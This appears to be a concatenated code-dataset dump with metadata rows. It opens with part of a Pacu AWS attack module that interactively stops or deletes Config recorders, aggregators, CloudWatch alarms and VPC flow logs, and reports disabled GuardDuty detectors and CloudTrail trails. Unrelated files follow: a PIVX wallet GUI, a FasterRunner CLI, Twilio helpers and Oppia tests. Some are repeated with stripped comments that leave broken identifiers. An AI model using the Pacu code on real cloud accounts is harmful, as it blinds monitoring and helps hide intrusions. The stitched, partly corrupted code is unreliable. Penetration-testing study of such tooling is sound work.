print("No rules found. Skipping Config rules...\n")
if len(recorders) > 0:
print("Starting Config recorders...\n")
for region in config_regions:
print(" Starting region {}...\n".format(region))
client = pacu_main.get_boto3_client("config", region)
for recorder in recorders:
if recorder["Region"] == region:
action = (
input(
" Recorder Name: {}\n Do you want to stop (stop), delete (del), or skip (skip) this recorder? (stop/del/skip) ".format(
recorder["name"]
)
)
.strip()
.lower()
)
if action == "del":
try:
client.delete_configuration_recorder(
ConfigurationRecorderName=recorder["name"]
)
print(
" Successfully deleted recorder {}!\n".format(
recorder["name"]
)
)
summary_data["awsconfig"]["recorders"]["deleted"] += 1
except Exception as error:
print(
" Could not delete recorder {}:\n {}\n".format(
recorder["name"], error
)
)
elif action == "stop":
try:
client.stop_configuration_recorder(
ConfigurationRecorderName=recorder["name"]
)
print(
" Successfully stopped recorder {}!\n".format(
recorder["name"]
)
)
summary_data["awsconfig"]["recorders"]["stopped"] += 1
except Exception as error:
print(
" Could not stop recorder {}:\n {}\n".format(
recorder["name"], error
)
)
else:
print(
" Skipping recorder {}...\n".format(recorder["name"])
)
print("Config recorders finished.\n")
else:
print("No recorders found. Skipping Config recorders...\n")
if len(aggregators) > 0:
print("Starting Config aggregators...\n")
for region in config_regions:
print(" Starting region {}...\n".format(region))
client = pacu_main.get_boto3_client("config", region)
for aggregator in aggregators:
if aggregator["Region"] == region:
action = (
input(
" Aggregator Name: {}\n Do you want to delete this aggregator? (y/n) ".format(
aggregator["ConfigurationAggregatorName"]
)
)
.strip()
.lower()
)
if action == "y":
try:
client.delete_configuration_aggregator(
ConfigurationAggregatorName=aggregator[
"ConfigurationAggregatorName"
]
)
print(
" Successfully deleted aggregator {}!\n".format(
aggregator["ConfigurationAggregatorName"]
)
)
summary_data["awsconfig"]["aggregators"]["deleted"] += 1
except Exception as error:
print(
" Could not delete aggregator {}:\n {}\n".format(
aggregator["ConfigurationAggregatorName"], error
)
)
else:
print(
" Skipping aggregator {}...\n".format(
aggregator["ConfigurationAggregatorName"]
)
)
print("Config aggregators finished.\n")
else:
print("No aggregators found. Skipping Config aggregators...\n")
if len(alarms) > 0:
print("Starting CloudWatch alarms...\n")
summary_data["cloudwatch"] = {
"deleted": 0,
"disabled": 0,
}
for region in cw_regions:
print(" Starting region {}...\n".format(region))
client = pacu_main.get_boto3_client("cloudwatch", region)
for alarm in alarms:
if alarm["Region"] == region:
action = (
input(
" Alarm Name: {}\n Do you want to disable the associated actions (dis), delete (del), or skip (s) this alarm? (dis/del/s) ".format(
alarm["AlarmName"]
)
)
.strip()
.lower()
)
if action == "del":
try:
client.delete_alarms(AlarmNames=[alarm["AlarmName"]])
print(
" Successfully deleted alarm {}!\n".format(
alarm["AlarmName"]
)
)
summary_data["cloudwatch"]["deleted"] += 1
except Exception as error:
print(
" Could not delete alarm {}:\n {}\n".format(
alarm["AlarmName"], error
)
)
elif action == "dis":
try:
client.disable_alarm_actions(
AlarmNames=[alarm["AlarmName"]]
)
print(
" Successfully disabled actions for alarm {}!\n".format(
alarm["AlarmName"]
)
)
summary_data["cloudwatch"]["disabled"] += 1
except Exception as error:
print(
" Could not disable actions for alarm {}:\n {}\n".format(
alarm["AlarmName"], error
)
)
else:
print(
" Skipping alarm {}...\n".format(alarm["AlarmName"])
)
print("CloudWatch alarms finished.\n")
else:
print("No alarms found. Skipping CloudWatch...\n")
if len(flow_logs) > 0:
print("Starting VPC flow logs...\n")
summary_data["vpc"] = {"deleted": 0}
for region in vpc_regions:
print(" Starting region {}...\n".format(region))
client = pacu_main.get_boto3_client("ec2", region)
logs_to_delete = []
for log in flow_logs:
if log["Region"] == region:
action = (
input(
" Flow Log ID: {}\n Do you want to delete this flow log? (y/n) ".format(
log["FlowLogId"]
)
)
.strip()
.lower()
)
if action == "y":
logs_to_delete.append(log["FlowLogId"])
print(
" Added flow log {} to list of logs to delete.".format(
log["FlowLogId"]
)
)
else:
print(
" Skipping flow log {}...\n".format(log["FlowLogId"])
)
try:
response = client.delete_flow_logs(FlowLogIds=logs_to_delete)
print(
" Attempt to delete all flow logs succeeded. Read the output for more information on any fails:\n {}\n".format(
response
)
)
summary_data["vpc"]["deleted"] += len(logs_to_delete) - len(
response["Unsuccessful"]
)
except Exception as error:
print(
" Attempt to delete flow logs failed:\n {}\n".format(
error
)
)
print("VPC flow logs finished.\n")
else:
print("No flow logs found. Skipping VPC...\n")
return summary_data
def summary(data, pacu_main):
out = ""
if "guardduty" in data:
out += " GuardDuty:\n"
out += " {} detector(s) disabled.\n".format(data["guardduty"]["disabled"])
out += " {} detector(s) deleted.\n".format(data["guardduty"]["deleted"])
if "cloudtrail" in data:
out += " CloudTrail:\n"
out += " {} trail(s) disabled.\n".format(data["cloudtrail"]["disabled"])
out += " {} trail(s) deleted.\n".format(data["cloudtrail"]["deleted"])
out += " {} trail(s) minimized.\n".format(data["cloudtrail"]["minimized"])
if "awsconfig" in data:
out += " AWSConfig:\n"
out += " Rules:\n"
out += " {} rule(s) deleted.\n".format(
data["awsconfig"]["rules"]["deleted"]
)
out += " Recorders:\n"
out += " {} recorder(s) deleted.\n".format(
data["awsconfig"]["recorders"]["deleted"]
)
out += " {} recorder(s) stopped.\n".format(
data["awsconfig"]["recorders"]["stopped"]
)
out += " Aggregators:\n"
out += " {} aggregator(s) deleted.\n".format(
data["awsconfig"]["aggregators"]["deleted"]
)
if "vpc" in data:
out += " VPC:\n"
out += " {} flow log(s) deleted.\n".format(data["vpc"]["deleted"])
return out
| true
| true
|
1c4481625ea42757e76faf57067bad00031d262c
| 6,458
|
py
|
Python
|
src/qt/gui_tabRewards.py
|
Fuzzbawls/PIVX-SPMT
|
4d5157e452dc43894805c7149b897849dc900029
|
[
"MIT"
] | null | null | null |
src/qt/gui_tabRewards.py
|
Fuzzbawls/PIVX-SPMT
|
4d5157e452dc43894805c7149b897849dc900029
|
[
"MIT"
] | null | null | null |
src/qt/gui_tabRewards.py
|
Fuzzbawls/PIVX-SPMT
|
4d5157e452dc43894805c7149b897849dc900029
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import os.path
sys.path.append(os.path.join(os.path.dirname(__file__), 'src'))
from PyQt5.QtCore import Qt
from PyQt5.Qt import QLabel, QFormLayout, QDoubleSpinBox, QTableWidget, QTableWidgetItem, QAbstractItemView, QHeaderView,\
QCheckBox
from PyQt5.QtWidgets import QWidget, QPushButton, QHBoxLayout, QGroupBox, QVBoxLayout,\
QProgressBar
from PyQt5.QtWidgets import QLineEdit, QComboBox
class TabRewards_gui(QWidget):
def __init__(self, *args, **kwargs):
QWidget.__init__(self)
self.initRewardsForm()
mainVertical = QVBoxLayout()
mainVertical.addWidget(self.rewardsForm)
buttonbox = QHBoxLayout()
buttonbox.addStretch(1)
buttonbox.addWidget(self.btn_Cancel)
mainVertical.addLayout(buttonbox)
self.setLayout(mainVertical)
def initRewardsForm(self):
self.collateralHidden = True
self.rewardsForm = QGroupBox()
self.rewardsForm.setTitle("Transfer Rewards")
layout = QFormLayout()
layout.setContentsMargins(10, 10, 10, 10)
layout.setSpacing(13)
layout.setFieldGrowthPolicy(QFormLayout.AllNonFixedFieldsGrow)
##--- ROW 1
hBox = QHBoxLayout()
self.mnSelect = QComboBox()
self.mnSelect.setToolTip("Select Masternode")
hBox.addWidget(self.mnSelect)
label = QLabel("Total Address Balance")
label.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
hBox.addWidget(label)
self.addrAvailLine = QLabel()
self.addrAvailLine.setToolTip("PIVX Address total balance")
self.addrAvailLine.setText("--")
hBox.addWidget(self.addrAvailLine)
self.btn_toggleCollateral = QPushButton("Show Collateral")
hBox.addWidget(self.btn_toggleCollateral)
hBox.setStretch(0,1)
hBox.setStretch(1,0)
hBox.setStretch(2,0)
layout.addRow(QLabel("Masternode"), hBox)
## --- ROW 2: REWARDS
self.rewardsList = QVBoxLayout()
self.rewardsList.statusLabel = QLabel('<b style="color:purple">Checking explorer...</b>')
self.rewardsList.statusLabel.setVisible(True)
self.rewardsList.addWidget(self.rewardsList.statusLabel)
self.rewardsList.box = QTableWidget()
self.rewardsList.box.setMinimumHeight(140)
#self.rewardsList.box.setMaximumHeight(140)
self.rewardsList.box.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
self.rewardsList.box.setSelectionMode(QAbstractItemView.MultiSelection)
self.rewardsList.box.setSelectionBehavior(QAbstractItemView.SelectRows)
self.rewardsList.box.setShowGrid(True)
self.rewardsList.box.setColumnCount(4)
self.rewardsList.box.setRowCount(0)
self.rewardsList.box.horizontalHeader().setSectionResizeMode(2, QHeaderView.Stretch)
self.rewardsList.box.verticalHeader().hide()
item = QTableWidgetItem()
item.setText("PIVs")
item.setTextAlignment(Qt.AlignCenter)
self.rewardsList.box.setHorizontalHeaderItem(0, item)
item = QTableWidgetItem()
item.setText("Confirmations")
item.setTextAlignment(Qt.AlignCenter)
self.rewardsList.box.setHorizontalHeaderItem(1, item)
item = QTableWidgetItem()
item.setText("TX Hash")
item.setTextAlignment(Qt.AlignCenter)
self.rewardsList.box.setHorizontalHeaderItem(2, item)
item = QTableWidgetItem()
item.setText("TX Output N")
item.setTextAlignment(Qt.AlignCenter)
self.rewardsList.box.setHorizontalHeaderItem(3, item)
item = QTableWidgetItem()
self.rewardsList.addWidget(self.rewardsList.box)
layout.addRow(self.rewardsList)
##--- ROW 3
hBox2 = QHBoxLayout()
self.btn_selectAllRewards = QPushButton("Select All")
self.btn_selectAllRewards.setToolTip("Select all available UTXOs")
hBox2.addWidget(self.btn_selectAllRewards)
self.btn_deselectAllRewards = QPushButton("Deselect all")
self.btn_deselectAllRewards.setToolTip("Deselect current selection")
hBox2.addWidget(self.btn_deselectAllRewards)
hBox2.addWidget(QLabel("Selected rewards"))
self.selectedRewardsLine = QLabel()
self.selectedRewardsLine.setMinimumWidth(200)
self.selectedRewardsLine.setStyleSheet("color: purple")
self.selectedRewardsLine.setToolTip("PIVX to move away")
hBox2.addWidget(self.selectedRewardsLine)
hBox2.addStretch(1)
self.swiftxCheck = QCheckBox()
self.swiftxCheck.setToolTip("check for SwiftX instant transaction (flat fee rate of 0.01 PIV)")
hBox2.addWidget(QLabel("Use SwiftX"))
hBox2.addWidget(self.swiftxCheck)
layout.addRow(hBox2)
##--- ROW 4
hBox3 = QHBoxLayout()
self.destinationLine = QLineEdit()
self.destinationLine.setToolTip("PIVX address to transfer rewards to")
hBox3.addWidget(self.destinationLine)
hBox3.addWidget(QLabel("Fee"))
self.feeLine = QDoubleSpinBox()
self.feeLine.setDecimals(8)
self.feeLine.setPrefix("PIV ")
self.feeLine.setToolTip("Insert a small fee amount")
self.feeLine.setFixedWidth(150)
self.feeLine.setSingleStep(0.001)
hBox3.addWidget(self.feeLine)
self.btn_sendRewards = QPushButton("Send")
hBox3.addWidget(self.btn_sendRewards)
layout.addRow(QLabel("Destination Address"), hBox3)
##--- ROW 5
hBox4 = QHBoxLayout()
hBox4.addStretch(1)
self.loadingLine = QLabel("<b style='color:red'>Preparing TX.</b> Completed: ")
self.loadingLinePercent = QProgressBar()
self.loadingLinePercent.setMaximumWidth(200)
self.loadingLinePercent.setMaximumHeight(10)
self.loadingLinePercent.setRange(0, 100)
hBox4.addWidget(self.loadingLine)
hBox4.addWidget(self.loadingLinePercent)
self.loadingLine.hide()
self.loadingLinePercent.hide()
layout.addRow(hBox4)
#--- Set Layout
self.rewardsForm.setLayout(layout)
#--- ROW 5
self.btn_Cancel = QPushButton("Clear/Reload")
| 45.478873
| 123
| 0.658873
|
import sys
import os.path
sys.path.append(os.path.join(os.path.dirname(__file__), 'src'))
from PyQt5.QtCore import Qt
from PyQt5.Qt import QLabel, QFormLayout, QDoubleSpinBox, QTableWidget, QTableWidgetItem, QAbstractItemView, QHeaderView,\
QCheckBox
from PyQt5.QtWidgets import QWidget, QPushButton, QHBoxLayout, QGroupBox, QVBoxLayout,\
QProgressBar
from PyQt5.QtWidgets import QLineEdit, QComboBox
class TabRewards_gui(QWidget):
def __init__(self, *args, **kwargs):
QWidget.__init__(self)
self.initRewardsForm()
mainVertical = QVBoxLayout()
mainVertical.addWidget(self.rewardsForm)
buttonbox = QHBoxLayout()
buttonbox.addStretch(1)
buttonbox.addWidget(self.btn_Cancel)
mainVertical.addLayout(buttonbox)
self.setLayout(mainVertical)
def initRewardsForm(self):
self.collateralHidden = True
self.rewardsForm = QGroupBox()
self.rewardsForm.setTitle("Transfer Rewards")
layout = QFormLayout()
layout.setContentsMargins(10, 10, 10, 10)
layout.setSpacing(13)
layout.setFieldGrowthPolicy(QFormLayout.AllNonFixedFieldsGrow)
ox = QHBoxLayout()
self.mnSelect = QComboBox()
self.mnSelect.setToolTip("Select Masternode")
hBox.addWidget(self.mnSelect)
label = QLabel("Total Address Balance")
label.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
hBox.addWidget(label)
self.addrAvailLine = QLabel()
self.addrAvailLine.setToolTip("PIVX Address total balance")
self.addrAvailLine.setText("--")
hBox.addWidget(self.addrAvailLine)
self.btn_toggleCollateral = QPushButton("Show Collateral")
hBox.addWidget(self.btn_toggleCollateral)
hBox.setStretch(0,1)
hBox.setStretch(1,0)
hBox.setStretch(2,0)
layout.addRow(QLabel("Masternode"), hBox)
List = QVBoxLayout()
self.rewardsList.statusLabel = QLabel('<b style="color:purple">Checking explorer...</b>')
self.rewardsList.statusLabel.setVisible(True)
self.rewardsList.addWidget(self.rewardsList.statusLabel)
self.rewardsList.box = QTableWidget()
self.rewardsList.box.setMinimumHeight(140)
self.rewardsList.box.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
self.rewardsList.box.setSelectionMode(QAbstractItemView.MultiSelection)
self.rewardsList.box.setSelectionBehavior(QAbstractItemView.SelectRows)
self.rewardsList.box.setShowGrid(True)
self.rewardsList.box.setColumnCount(4)
self.rewardsList.box.setRowCount(0)
self.rewardsList.box.horizontalHeader().setSectionResizeMode(2, QHeaderView.Stretch)
self.rewardsList.box.verticalHeader().hide()
item = QTableWidgetItem()
item.setText("PIVs")
item.setTextAlignment(Qt.AlignCenter)
self.rewardsList.box.setHorizontalHeaderItem(0, item)
item = QTableWidgetItem()
item.setText("Confirmations")
item.setTextAlignment(Qt.AlignCenter)
self.rewardsList.box.setHorizontalHeaderItem(1, item)
item = QTableWidgetItem()
item.setText("TX Hash")
item.setTextAlignment(Qt.AlignCenter)
self.rewardsList.box.setHorizontalHeaderItem(2, item)
item = QTableWidgetItem()
item.setText("TX Output N")
item.setTextAlignment(Qt.AlignCenter)
self.rewardsList.box.setHorizontalHeaderItem(3, item)
item = QTableWidgetItem()
self.rewardsList.addWidget(self.rewardsList.box)
layout.addRow(self.rewardsList)
ox2 = QHBoxLayout()
self.btn_selectAllRewards = QPushButton("Select All")
self.btn_selectAllRewards.setToolTip("Select all available UTXOs")
hBox2.addWidget(self.btn_selectAllRewards)
self.btn_deselectAllRewards = QPushButton("Deselect all")
self.btn_deselectAllRewards.setToolTip("Deselect current selection")
hBox2.addWidget(self.btn_deselectAllRewards)
hBox2.addWidget(QLabel("Selected rewards"))
self.selectedRewardsLine = QLabel()
self.selectedRewardsLine.setMinimumWidth(200)
self.selectedRewardsLine.setStyleSheet("color: purple")
self.selectedRewardsLine.setToolTip("PIVX to move away")
hBox2.addWidget(self.selectedRewardsLine)
hBox2.addStretch(1)
self.swiftxCheck = QCheckBox()
self.swiftxCheck.setToolTip("check for SwiftX instant transaction (flat fee rate of 0.01 PIV)")
hBox2.addWidget(QLabel("Use SwiftX"))
hBox2.addWidget(self.swiftxCheck)
layout.addRow(hBox2)
ox3 = QHBoxLayout()
self.destinationLine = QLineEdit()
self.destinationLine.setToolTip("PIVX address to transfer rewards to")
hBox3.addWidget(self.destinationLine)
hBox3.addWidget(QLabel("Fee"))
self.feeLine = QDoubleSpinBox()
self.feeLine.setDecimals(8)
self.feeLine.setPrefix("PIV ")
self.feeLine.setToolTip("Insert a small fee amount")
self.feeLine.setFixedWidth(150)
self.feeLine.setSingleStep(0.001)
hBox3.addWidget(self.feeLine)
self.btn_sendRewards = QPushButton("Send")
hBox3.addWidget(self.btn_sendRewards)
layout.addRow(QLabel("Destination Address"), hBox3)
ox4 = QHBoxLayout()
hBox4.addStretch(1)
self.loadingLine = QLabel("<b style='color:red'>Preparing TX.</b> Completed: ")
self.loadingLinePercent = QProgressBar()
self.loadingLinePercent.setMaximumWidth(200)
self.loadingLinePercent.setMaximumHeight(10)
self.loadingLinePercent.setRange(0, 100)
hBox4.addWidget(self.loadingLine)
hBox4.addWidget(self.loadingLinePercent)
self.loadingLine.hide()
self.loadingLinePercent.hide()
layout.addRow(hBox4)
self.rewardsForm.setLayout(layout)
self.btn_Cancel = QPushButton("Clear/Reload")
| true
| true
|
1c44828ab8ac3c3d9d148eb2ff2de1a5e2d9b4cb
| 611
|
py
|
Python
|
fastrunner/management/commands/cli.py
|
wss1029681084/FasterRunner
|
79f0c9ec00a6aa020c1fc48c5a257775412cd570
|
[
"MIT"
] | 1
|
2018-12-18T06:07:39.000Z
|
2018-12-18T06:07:39.000Z
|
fastrunner/management/commands/cli.py
|
wss1029681084/FasterRunner
|
79f0c9ec00a6aa020c1fc48c5a257775412cd570
|
[
"MIT"
] | null | null | null |
fastrunner/management/commands/cli.py
|
wss1029681084/FasterRunner
|
79f0c9ec00a6aa020c1fc48c5a257775412cd570
|
[
"MIT"
] | null | null | null |
# encoding: utf-8
# -*- coding:utf-8 -*-
from django.core.management.base import BaseCommand
from httprunner import logger
from FasterRunner.__about__ import __version__
class Command(BaseCommand):
def add_arguments(self, parser):
""" API test: parse command line options and run commands.
"""
parser.add_argument(
'-V', '--Version', dest='version', action='store_true',
help="show version")
def handle(self, *args, **options):
if options['version']:
logger.color_print("{}".format(__version__), "GREEN")
exit(0)
| 26.565217
| 67
| 0.621931
|
from django.core.management.base import BaseCommand
from httprunner import logger
from FasterRunner.__about__ import __version__
class Command(BaseCommand):
def add_arguments(self, parser):
parser.add_argument(
'-V', '--Version', dest='version', action='store_true',
help="show version")
def handle(self, *args, **options):
if options['version']:
logger.color_print("{}".format(__version__), "GREEN")
exit(0)
| true
| true
|
1c4482d3efed66b2dcba6ba7a251c16ecf685d36
| 1,606
|
py
|
Python
|
twilio/rest/resources/recordings.py
|
ProGamerCode/workshop
|
a45a7e9a0982e1b0d183ce2787d6cbb069acf03d
|
[
"MIT"
] | 3
|
2015-07-04T07:23:32.000Z
|
2016-04-06T21:51:37.000Z
|
twilio/rest/resources/recordings.py
|
ProGamerCode/workshop
|
a45a7e9a0982e1b0d183ce2787d6cbb069acf03d
|
[
"MIT"
] | null | null | null |
twilio/rest/resources/recordings.py
|
ProGamerCode/workshop
|
a45a7e9a0982e1b0d183ce2787d6cbb069acf03d
|
[
"MIT"
] | 8
|
2015-07-04T07:24:08.000Z
|
2020-04-27T02:23:49.000Z
|
from twilio.rest.resources.util import normalize_dates
from twilio.rest.resources import InstanceResource, ListResource
class Transcription(InstanceResource):
pass
class Transcriptions(ListResource):
name = "Transcriptions"
instance = Transcription
def list(self, **kwargs):
"""
Return a list of :class:`Transcription` resources
"""
return self.get_instances(kwargs)
class Recording(InstanceResource):
subresources = [Transcriptions]
def __init__(self, *args, **kwargs):
super(Recording, self).__init__(*args, **kwargs)
self.formats = {
"mp3": self.uri + ".mp3",
"wav": self.uri + ".wav",
}
def delete(self):
"""
Delete this recording
"""
return self.delete_instance()
class Recordings(ListResource):
name = "Recordings"
instance = Recording
@normalize_dates
def list(self, before=None, after=None, **kwargs):
"""
Returns a page of :class:`Recording` resources as a list.
For paging information see :class:`ListResource`.
:param date after: Only list recordings logged after this datetime
:param date before: Only list recordings logger before this datetime
:param call_sid: Only list recordings from this :class:`Call`
"""
kwargs["DateCreated<"] = before
kwargs["DateCreated>"] = after
return self.get_instances(kwargs)
def delete(self, sid):
"""
Delete the given recording
"""
return self.delete_instance(sid)
| 25.09375
| 76
| 0.625156
|
from twilio.rest.resources.util import normalize_dates
from twilio.rest.resources import InstanceResource, ListResource
class Transcription(InstanceResource):
pass
class Transcriptions(ListResource):
name = "Transcriptions"
instance = Transcription
def list(self, **kwargs):
return self.get_instances(kwargs)
class Recording(InstanceResource):
subresources = [Transcriptions]
def __init__(self, *args, **kwargs):
super(Recording, self).__init__(*args, **kwargs)
self.formats = {
"mp3": self.uri + ".mp3",
"wav": self.uri + ".wav",
}
def delete(self):
return self.delete_instance()
class Recordings(ListResource):
name = "Recordings"
instance = Recording
@normalize_dates
def list(self, before=None, after=None, **kwargs):
kwargs["DateCreated<"] = before
kwargs["DateCreated>"] = after
return self.get_instances(kwargs)
def delete(self, sid):
return self.delete_instance(sid)
| true
| true
|
1c44840024dc6589b681daa749547890a83a74f1
| 72,269
|
py
|
Python
|
core/controllers/suggestion_test.py
|
prayutsu/oppia
|
e82da7653f7bbfb9ded0e1ba16cd9f481ff5a786
|
[
"Apache-2.0"
] | 2
|
2020-03-28T18:32:45.000Z
|
2021-02-07T18:29:31.000Z
|
core/controllers/suggestion_test.py
|
prayutsu/oppia
|
e82da7653f7bbfb9ded0e1ba16cd9f481ff5a786
|
[
"Apache-2.0"
] | 35
|
2019-02-23T20:31:21.000Z
|
2019-08-19T12:32:13.000Z
|
core/controllers/suggestion_test.py
|
prayutsu/oppia
|
e82da7653f7bbfb9ded0e1ba16cd9f481ff5a786
|
[
"Apache-2.0"
] | 1
|
2021-01-28T05:20:56.000Z
|
2021-01-28T05:20:56.000Z
|
# coding: utf-8
#
# Copyright 2018 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for suggestion controllers."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import os
from constants import constants
from core.domain import exp_domain
from core.domain import exp_fetchers
from core.domain import exp_services
from core.domain import feedback_services
from core.domain import fs_domain
from core.domain import opportunity_services
from core.domain import question_domain
from core.domain import question_services
from core.domain import rights_domain
from core.domain import rights_manager
from core.domain import skill_services
from core.domain import state_domain
from core.domain import story_domain
from core.domain import story_services
from core.domain import suggestion_services
from core.domain import topic_domain
from core.domain import topic_services
from core.domain import user_services
from core.platform import models
from core.tests import test_utils
import feconf
import python_utils
(suggestion_models, feedback_models) = models.Registry.import_models([
models.NAMES.suggestion, models.NAMES.feedback])
class SuggestionUnitTests(test_utils.GenericTestBase):
IMAGE_UPLOAD_URL_PREFIX = '/createhandler/imageupload'
ASSET_HANDLER_URL_PREFIX = '/assetsdevhandler'
EXP_ID = 'exp1'
TRANSLATION_LANGUAGE_CODE = 'en'
AUTHOR_EMAIL = 'author@example.com'
AUTHOR_EMAIL_2 = 'author2@example.com'
REVIEWER_EMAIL = 'reviewer@example.com'
TRANSLATOR_EMAIL = 'translator@example.com'
NORMAL_USER_EMAIL = 'user@example.com'
def setUp(self):
super(SuggestionUnitTests, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.signup(self.AUTHOR_EMAIL, 'author')
self.signup(self.AUTHOR_EMAIL_2, 'author2')
self.signup(self.NORMAL_USER_EMAIL, 'normalUser')
self.signup(self.REVIEWER_EMAIL, 'reviewer')
self.signup(self.TRANSLATOR_EMAIL, 'translator')
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
self.author_id = self.get_user_id_from_email(self.AUTHOR_EMAIL)
self.author_id_2 = self.get_user_id_from_email(self.AUTHOR_EMAIL_2)
self.reviewer_id = self.get_user_id_from_email(self.REVIEWER_EMAIL)
self.translator_id = self.get_user_id_from_email(self.TRANSLATOR_EMAIL)
self.set_admins([self.ADMIN_USERNAME])
user_services.allow_user_to_review_translation_in_language(
self.reviewer_id, 'hi')
self.editor = user_services.UserActionsInfo(self.editor_id)
# Login and create exploration and suggestions.
self.login(self.EDITOR_EMAIL)
exploration = (
self.save_new_linear_exp_with_state_names_and_interactions(
self.EXP_ID, self.editor_id, ['State 1', 'State 2', 'State 3'],
['TextInput'], category='Algebra'))
self.old_content = state_domain.SubtitledHtml(
'content', '<p>old content html</p>').to_dict()
exploration.states['State 1'].update_content(
state_domain.SubtitledHtml.from_dict(self.old_content))
exploration.states['State 2'].update_content(
state_domain.SubtitledHtml.from_dict(self.old_content))
exploration.states['State 3'].update_content(
state_domain.SubtitledHtml.from_dict(self.old_content))
exp_services._save_exploration(self.editor_id, exploration, '', []) # pylint: disable=protected-access
rights_manager.publish_exploration(self.editor, self.EXP_ID)
rights_manager.assign_role_for_exploration(
self.editor, self.EXP_ID, self.owner_id, rights_domain.ROLE_EDITOR)
self.new_content = state_domain.SubtitledHtml(
'content', '<p>new content html</p>').to_dict()
self.resubmit_change_content = state_domain.SubtitledHtml(
'content', '<p>resubmit change content html</p>').to_dict()
self.logout()
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_EDIT_STATE_CONTENT),
'target_type': (
feconf.ENTITY_TYPE_EXPLORATION),
'target_id': 'exp1',
'target_version_at_submission': exploration.version,
'change': {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'State 1',
'old_value': self.old_content,
'new_value': self.new_content
},
'description': 'change to state 1',
}, csrf_token=csrf_token)
self.logout()
self.login(self.AUTHOR_EMAIL_2)
csrf_token = self.get_new_csrf_token()
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_EDIT_STATE_CONTENT),
'target_type': (
feconf.ENTITY_TYPE_EXPLORATION),
'target_id': 'exp1',
'target_version_at_submission': exploration.version,
'change': {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'State 2',
'old_value': self.old_content,
'new_value': self.new_content
},
'description': 'change to state 2',
}, csrf_token=csrf_token)
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_EDIT_STATE_CONTENT),
'target_type': (
feconf.ENTITY_TYPE_EXPLORATION),
'target_id': 'exp1',
'target_version_at_submission': exploration.version,
'change': {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'State 3',
'old_value': self.old_content,
'new_value': self.new_content
},
'description': 'change to state 3',
}, csrf_token=csrf_token)
self.logout()
self.login(self.TRANSLATOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_TRANSLATE_CONTENT),
'target_type': feconf.ENTITY_TYPE_EXPLORATION,
'target_id': 'exp1',
'target_version_at_submission': exploration.version,
'change': {
'cmd': exp_domain.CMD_ADD_TRANSLATION,
'state_name': 'State 3',
'content_id': 'content',
'language_code': 'hi',
'content_html': '<p>old content html</p>',
'translation_html': '<p>In Hindi</p>'
},
'description': 'change to state 3',
}, csrf_token=csrf_token)
self.logout()
def test_create_suggestion(self):
self.login(self.AUTHOR_EMAIL_2)
csrf_token = self.get_new_csrf_token()
exploration = exp_fetchers.get_exploration_by_id(self.EXP_ID)
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_EDIT_STATE_CONTENT),
'target_type': (
feconf.ENTITY_TYPE_EXPLORATION),
'target_id': 'exp1',
'target_version_at_submission': exploration.version,
'change': {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'State 3',
'new_value': self.new_content
},
'description': 'change again to state 3',
}, csrf_token=csrf_token)
suggestions = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id_2))['suggestions']
self.assertEqual(len(suggestions), 3)
self.logout()
def test_create_suggestion_invalid_target_version_input(self):
self.login(self.AUTHOR_EMAIL_2)
csrf_token = self.get_new_csrf_token()
response = self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_EDIT_STATE_CONTENT),
'target_type': (
feconf.ENTITY_TYPE_EXPLORATION),
'target_id': 'exp1',
'target_version_at_submission': 'invalid target version',
'change': {
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'State 3',
'new_value': self.new_content
},
'description': 'change again to state 3',
}, csrf_token=csrf_token, expected_status_int=400)
suggestions = self.get_json(
'%s?author_id=%s' % (
feconf.SUGGESTION_LIST_URL_PREFIX,
self.author_id_2))['suggestions']
self.assertEqual(
response['error'],
'Expected target_version_at_submission to be an int, received <type'
' \'unicode\'>')
self.assertEqual(len(suggestions), 2)
self.logout()
def test_suggestion_to_exploration_handler_with_invalid_suggestion_id(self):
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
suggestion_to_accept = self.get_json(
'%s?author_id=%s' % (
